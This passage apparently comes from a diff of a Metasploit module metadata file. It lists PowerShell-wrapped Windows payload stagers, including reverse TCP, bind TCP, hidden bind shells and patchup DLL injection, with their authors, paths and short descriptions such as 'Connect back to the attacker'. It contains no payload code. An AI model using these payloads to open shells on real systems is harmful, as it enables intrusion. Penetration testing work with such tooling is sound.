"windows/meterpreter/reverse_tcp", - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/reverse_tcp" - }, - "payload_cmd/windows/powershell/meterpreter/reverse_tcp_allports": { - "name": "Powershell Exec, Reverse All-Port TCP Stager", - "fullname": "payload/cmd/windows/powershell/meterpreter/reverse_tcp_allports", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves", - "hdm " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/meterpreter/reverse_tcp_allports", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/meterpreter/reverse_tcp_allports", - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/reverse_tcp_allports" - }, - "payload_cmd/windows/powershell/meterpreter/reverse_tcp_dns": { - "name": "Powershell Exec, Reverse TCP Stager (DNS)", - "fullname": "payload/cmd/windows/powershell/meterpreter/reverse_tcp_dns", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves", - "hdm ", - "RageLtMan" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/meterpreter/reverse_tcp_dns", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/meterpreter/reverse_tcp_dns", - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/reverse_tcp_dns" - }, - "payload_cmd/windows/powershell/meterpreter/reverse_tcp_rc4": { - "name": "Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/powershell/meterpreter/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves", - "hdm ", - "mihi", - "RageLtMan" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/meterpreter/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/meterpreter/reverse_tcp_rc4", - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/reverse_tcp_rc4" - }, - "payload_cmd/windows/powershell/meterpreter/reverse_tcp_rc4_dns": { - "name": "Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", - "fullname": "payload/cmd/windows/powershell/meterpreter/reverse_tcp_rc4_dns", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves", - "hdm ", - "mihi", - "RageLtMan" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/meterpreter/reverse_tcp_rc4_dns", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/meterpreter/reverse_tcp_rc4_dns", - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/reverse_tcp_rc4_dns" - }, - "payload_cmd/windows/powershell/meterpreter/reverse_tcp_uuid": { - "name": "Powershell Exec, Reverse TCP Stager with UUID Support", - "fullname": "payload/cmd/windows/powershell/meterpreter/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves", - "hdm " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker with UUID Support", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/meterpreter/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/meterpreter/reverse_tcp_uuid", - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/reverse_tcp_uuid" - }, - "payload_cmd/windows/powershell/meterpreter/reverse_winhttp": { - "name": "Powershell Exec, Windows Reverse HTTP Stager (winhttp)", - "fullname": "payload/cmd/windows/powershell/meterpreter/reverse_winhttp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves", - "hdm ", - "Borja Merino " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nTunnel communication over HTTP (Windows winhttp)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/meterpreter/reverse_winhttp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/meterpreter/reverse_winhttp", - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/reverse_winhttp" - }, - "payload_cmd/windows/powershell/meterpreter/reverse_winhttps": { - "name": "Powershell Exec, Windows Reverse HTTPS Stager (winhttp)", - "fullname": "payload/cmd/windows/powershell/meterpreter/reverse_winhttps", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves", - "hdm ", - "Borja Merino " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nTunnel communication over HTTPS (Windows winhttp)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/meterpreter/reverse_winhttps", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/meterpreter/reverse_winhttps", - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/reverse_winhttps" - }, - "payload_cmd/windows/powershell/metsvc_bind_tcp": { - "name": "Powershell Exec, Windows Meterpreter Service, Bind TCP", - "fullname": "payload/cmd/windows/powershell/metsvc_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "hdm " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nStub payload for interacting with a Meterpreter Service", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/metsvc_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/metsvc_bind_tcp", - "staged": false - }, - "payload_cmd/windows/powershell/metsvc_reverse_tcp": { - "name": "Powershell Exec, Windows Meterpreter Service, Reverse TCP Inline", - "fullname": "payload/cmd/windows/powershell/metsvc_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "hdm " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nStub payload for interacting with a Meterpreter Service", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/metsvc_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/metsvc_reverse_tcp", - "staged": false - }, - "payload_cmd/windows/powershell/patchupdllinject/bind_hidden_ipknock_tcp": { - "name": "Powershell Exec, Hidden Bind Ipknock TCP Stager", - "fullname": "payload/cmd/windows/powershell/patchupdllinject/bind_hidden_ipknock_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "jt ", - "skape ", - "hdm ", - "sf ", - "Borja Merino " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode", - "references": [ - "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/patchupdllinject/bind_hidden_ipknock_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/patchupdllinject/bind_hidden_ipknock_tcp", - "staged": true, - "stage_refname": "windows/patchupdllinject", - "stager_refname": "windows/bind_hidden_ipknock_tcp" - }, - "payload_cmd/windows/powershell/patchupdllinject/bind_hidden_tcp": { - "name": "Powershell Exec, Hidden Bind TCP Stager", - "fullname": "payload/cmd/windows/powershell/patchupdllinject/bind_hidden_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "jt ", - "skape ", - "hdm ", - "sf ", - "Borja Merino " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.", - "references": [ - "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/patchupdllinject/bind_hidden_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/patchupdllinject/bind_hidden_tcp", - "staged": true, - "stage_refname": "windows/patchupdllinject", - "stager_refname": "windows/bind_hidden_tcp" - }, - "payload_cmd/windows/powershell/patchupdllinject/bind_ipv6_tcp": { - "name": "Powershell Exec, Bind IPv6 TCP Stager (Windows x86)", - "fullname": "payload/cmd/windows/powershell/patchupdllinject/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "jt ", - "skape ", - "hdm ", - "sf " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for an IPv6 connection (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/patchupdllinject/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/patchupdllinject/bind_ipv6_tcp", - "staged": true, - "stage_refname": "windows/patchupdllinject", - "stager_refname": "windows/bind_ipv6_tcp" - }, - "payload_cmd/windows/powershell/patchupdllinject/bind_ipv6_tcp_uuid": { - "name": "Powershell Exec, Bind IPv6 TCP Stager with UUID Support (Windows x86)", - "fullname": "payload/cmd/windows/powershell/patchupdllinject/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "jt ", - "skape ", - "hdm ", - "sf ", - "OJ Reeves" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for an IPv6 connection with UUID Support (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/patchupdllinject/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/patchupdllinject/bind_ipv6_tcp_uuid", - "staged": true, - "stage_refname": "windows/patchupdllinject", - "stager_refname": "windows/bind_ipv6_tcp_uuid" - }, - "payload_cmd/windows/powershell/patchupdllinject/bind_named_pipe": { - "name": "Powershell Exec, Windows x86 Bind Named Pipe Stager", - "fullname": "payload/cmd/windows/powershell/patchupdllinject/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "jt ", - "skape ", - "UserExistsError" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a pipe connection (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/patchupdllinject/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/patchupdllinject/bind_named_pipe", - "staged": true, - "stage_refname": "windows/patchupdllinject", - "stager_refname": "windows/bind_named_pipe" - }, - "payload_cmd/windows/powershell/patchupdllinject/bind_nonx_tcp": { - "name": "Powershell Exec, Bind TCP Stager (No NX or Win7)", - "fullname": "payload/cmd/windows/powershell/patchupdllinject/bind_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "jt ", - "skape ", - "vlad902 " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection (No NX)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/patchupdllinject/bind_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/patchupdllinject/bind_nonx_tcp", - "staged": true, - "stage_refname": "windows/patchupdllinject", - "stager_refname": "windows/bind_nonx_tcp" - }, - "payload_cmd/windows/powershell/patchupdllinject/bind_tcp": { - "name": "Powershell Exec, Bind TCP Stager (Windows x86)", - "fullname": "payload/cmd/windows/powershell/patchupdllinject/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "jt ", - "skape ", - "hdm ", - "sf " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/patchupdllinject/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/patchupdllinject/bind_tcp", - "staged": true, - "stage_refname": "windows/patchupdllinject", - "stager_refname": "windows/bind_tcp" - }, - "payload_cmd/windows/powershell/patchupdllinject/bind_tcp_rc4": { - "name": "Powershell Exec, Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/powershell/patchupdllinject/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "jt ", - "skape ", - "hdm ", - "sf ", - "mihi", - "RageLtMan" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/patchupdllinject/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/patchupdllinject/bind_tcp_rc4", - "staged": true, - "stage_refname": "windows/patchupdllinject", - "stager_refname": "windows/bind_tcp_rc4" - }, - "payload_cmd/windows/powershell/patchupdllinject/bind_tcp_uuid": { - "name": "Powershell Exec, Bind TCP Stager with UUID Support (Windows x86)", - "fullname": "payload/cmd/windows/powershell/patchupdllinject/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "jt ", - "skape ", - "hdm ", - "OJ Reeves" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection with UUID Support (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/patchupdllinject/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/patchupdllinject/bind_tcp_uuid", - "staged": true, - "stage_refname": "windows/patchupdllinject", - "stager_refname": "windows/bind_tcp_uuid" - }, - "payload_cmd/windows/powershell/patchupdllinject/find_tag": { - "name": "Powershell Exec, Find Tag Ordinal Stager", - "fullname": "payload/cmd/windows/powershell/patchupdllinject/find_tag", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "jt ", - "skape " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nUse an established connection", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/patchupdllinject/find_tag", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/patchupdllinject/find_tag", - "staged": true, - "stage_refname": "windows/patchupdllinject", - "stager_refname": "windows/findtag_ord" - }, - "payload_cmd/windows/powershell/patchupdllinject/reverse_ipv6_tcp": { - "name": "Powershell Exec, Reverse TCP Stager (IPv6)", - "fullname": "payload/cmd/windows/powershell/patchupdllinject/reverse_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "jt ", - "skape ", - "hdm ", - "sf " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker over IPv6", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/patchupdllinject/reverse_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/patchupdllinject/reverse_ipv6_tcp", - "staged": true, - "stage_refname": "windows/patchupdllinject", - "stager_refname": "windows/reverse_ipv6_tcp" - }, - "payload_cmd/windows/powershell/patchupdllinject/reverse_nonx_tcp": { - "name": "Powershell Exec, Reverse TCP Stager (No NX or Win7)", - "fullname": "payload/cmd/windows/powershell/patchupdllinject/reverse_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "jt ", - "skape ", - "vlad902 " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker (No NX)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/patchupdllinject/reverse_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/patchupdllinject/reverse_nonx_tcp", - "staged": true, - "stage_refname": "windows/patchupdllinject", - "stager_refname": "windows/reverse_nonx_tcp" - }, - "payload_cmd/windows/powershell/patchupdllinject/reverse_ord_tcp": { - "name": "Powershell Exec, Reverse Ordinal TCP Stager (No NX or Win7)", - "fullname": "payload/cmd/windows/powershell/patchupdllinject/reverse_ord_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "jt ", - "skape ", - "spoonm " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/patchupdllinject/reverse_ord_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/patchupdllinject/reverse_ord_tcp", - "staged": true, - "stage_refname": "windows/patchupdllinject", - "stager_refname": "windows/reverse_ord_tcp" - }, - "payload_cmd/windows/powershell/patchupdllinject/reverse_tcp": { - "name": "Powershell Exec, Reverse TCP Stager", - "fullname": "payload/cmd/windows/powershell/patchupdllinject/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "jt ", - "skape ", - "hdm ", - "sf " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/patchupdllinject/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/patchupdllinject/reverse_tcp", - "staged": true, - "stage_refname": "windows/patchupdllinject", - "stager_refname": "windows/reverse_tcp" - }, - "payload_cmd/windows/powershell/patchupdllinject/reverse_tcp_allports": { - "name": "Powershell Exec, Reverse All-Port TCP Stager", - "fullname": "payload/cmd/windows/powershell/patchupdllinject/reverse_tcp_allports", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "jt ", - "skape ", - "hdm ", - "sf " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/patchupdllinject/reverse_tcp_allports", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/patchupdllinject/reverse_tcp_allports", - "staged": true, - "stage_refname": "windows/patchupdllinject", - "stager_refname": "windows/reverse_tcp_allports" - }, - "payload_cmd/windows/powershell/patchupdllinject/reverse_tcp_dns": { - "name": "Powershell Exec, Reverse TCP Stager (DNS)", - "fullname": "payload/cmd/windows/powershell/patchupdllinject/reverse_tcp_dns", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "jt ", - "skape ", - "hdm ", - "sf ", - "RageLtMan" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/patchupdllinject/reverse_tcp_dns", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/patchupdllinject/reverse_tcp_dns", - "staged": true, - "stage_refname": "windows/patchupdllinject", - "stager_refname": "windows/reverse_tcp_dns" - }, - "payload_cmd/windows/powershell/patchupdllinject/reverse_tcp_rc4": { - "name": "Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/powershell/patchupdllinject/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - 